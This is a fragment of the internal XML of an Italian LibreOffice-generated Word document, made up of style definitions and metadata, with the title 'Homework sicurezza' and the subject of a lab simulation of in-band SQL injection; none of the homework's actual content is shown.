        <w:sz w:val="20"/>
      </w:rPr>
      <w:tab/>
      <w:t>Homework sicurezza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200"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="ＭＳ 明朝" w:cs=""/>
      <w:color w:val="1A1A1A"/>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60"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs="" w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="false"/>
      <w:color w:val="1A1A1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60"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="" w:cs="" w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:i w:val="false"/>
      <w:color w:val="1A1A1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altoaindice">
    <w:name w:val="Salto a indice"/>
    <w:qFormat/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Testosorgente">
    <w:name w:val="Testo sorgente"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono" w:eastAsia="Liberation Mono" w:cs="Liberation Mono"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Punti">
    <w:name w:val="Punti"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:eastAsia="OpenSymbol" w:cs="OpenSymbol"/>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Intestazioneepidipagina">
    <w:name w:val="Intestazione e piè di pagin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o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ice"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
      </w:tabs>
      <w:ind w:hanging="0" w:left="0"/>
    </w:pPr>
    <w:rPr/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="TOC 2"/>
    <w:basedOn w:val="Indice"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="clear" w:pos="720"/>
        <w:tab w:val="right" w:pos="8789"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Application>LibreOffice/7.6.2.1$Windows_X86_64 LibreOffice_project/56f7684011345957bbf33a7ee678afaf4d2ba333</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>8</Pages>
  <Words>1251</Words>
  <Characters>7215</Characters>
  <CharactersWithSpaces>8481</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Simone Di Berardino</dc:creator>
  <dc:description>generated by python-docx</dc:description>
  <dc:language>it-IT</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-18T18:13:01Z</dcterms:modified>
  <cp:revision>35</cp:revision>
  <dc:subject>SQL injection in-band – simulazione di laboratorio</dc:subject>
  <dc:title>Homework sicurezza</dc:title>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>